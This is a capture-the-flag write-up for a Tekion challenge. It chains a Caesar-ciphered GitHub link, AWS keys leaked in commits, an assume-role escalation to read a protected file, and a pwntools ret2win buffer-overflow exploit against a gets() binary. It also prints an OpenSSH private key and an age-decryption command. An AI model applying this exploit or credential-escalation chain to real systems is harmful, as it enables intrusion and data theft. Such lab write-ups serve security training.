Tekion

Tekion CTF Challenge:

Challenge:

Solution:

cookn://bdocpw.xjh/ozfdji-nkzzy/cmhn-xjhk-ntnozhn-yphk/omzz/hvdi

1. The given input is a caesar cipher encoded value so we decode it.

Note: https://github.com/tekion-speed/hrms-comp-systems-dump/tree/main

2. We got the Github URL from the decoded value.

3. While checking the commits we got the aws access key id and secret.

4. Using that access key and secret to access the s3 bucket file and enumerate and escalate the role salary-details-system-user to lambdaAccessRole and get the hr_systems_salary_module.json.

1. Configure the AWS using access key and secret.

2. Getting temporary credentials for the account using get-session-token so we can make API calls to any AWS service, we configure the AWS using the Accesskey, SecretAccessKey and Session Token

3. Using get-caller-identity to get the details about the IAM user or role whose credentials are used to call the operation.

4. We got the LambdaAccessRole in the github commits.

5. We set the temporary security credentials that you can use to access LamdaAccessRole using the assume-role function.

6. Once we set the key, get from the assume-role . Now we can able access the deny files hr_systems_salary_module.json.

5. The file was ELF Binary.

6. Looks vulnerable to Buffer Overflow attack.

7. Disassemble to Binary using the Ghidra and the main function is calling the vulnerable_function().

8. Analysing the Vulnerable_function() using gets() , gets() function is vulnerable to Buffer Overflow attack.

Man page of gets():

9. The hidden_function() not called anywhere in the program.

10. Debugging the program using GDB:

11. Finding the offset.

12. Writing the ret2win to solve the challenge.

from pwn import *
elf = context.binary = ELF("./chall.bin",checksec=False)
p = elf.process()
ret_gadget = 0x00000000004013eb;
payload = b'A'*72
payload += p64(ret_gadget)
payload += p64(elf.sym['hidden_function'])
p.sendlineafter('details: ',payload)
p.interactive()

Run this to get the private key.

-----BEGIN OPENSSH PRIVATE KEY-----

b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW

QyNTUxOQAAACCm0v2+zu5Btor6YJ20TdzaM7mldS6FgoxDGScF4bBtlgAAAKANaPlnDWj5

ZwAAAAtzc2gtZWQyNTUxOQAAACCm0v2+zu5Btor6YJ20TdzaM7mldS6FgoxDGScF4bBtlg

AAAEDR8fnfU6WumUI9Qh7qi1qpUgBFfzAMYbVzDdKgflzcpqbS/b7O7kG2ivpgnbRN3Noz

uaV1LoWCjEMZJwXhsG2WAAAAF3VidW50dUBpcC0xNzItMzEtNDMtMTE3AQIDBAUG

-----END OPENSSH PRIVATE KEY-----

Store it in privatekey

13. Get the given age key base64 decode and save it in a agekey file.

YWdlLWVuY3J5cHRpb24ub3JnL3YxCi0+IHNzaC1lZDI1NTE5IHBVT05LQSBGclNwUEwzNnBzVjZoUGVGdk9SVjFOOVRTd1JqRjdpTi9TaU81ckVudzFZCnl1WmlmV2diY2M2Smt5dFBmRFA4aW5JQ0loQTI0S1R3endlNmdmaTFSWEUKLS0tIE5yK0d3MFg5T0Vac0sxaGFNbUphcm9rbm1PUlRwVEZJNjRTZ0N3MTFFaTAKyJ9jMF/k1r9D3871i1PluzFDSo1kJZENZTI5+9HHPQLDlcTn9+xJmWIsrARtN7IrBzUp2lae9zH1T2xdI0Q1d5EAPBXP1MlNZGSb/X+5mNgPPLQucvWe3APKeGCtVB8BN5UVZREKbO/4iUP+wdgclw==

14. Using age decrypt the age with the private key.

age --decrypt --identity privatekey agekey > decrypt.txt && cat decrypt.txt

15. Flag format is Flag format => string{string}

We found the FLAG ⇒ almost_there{curious-seeker}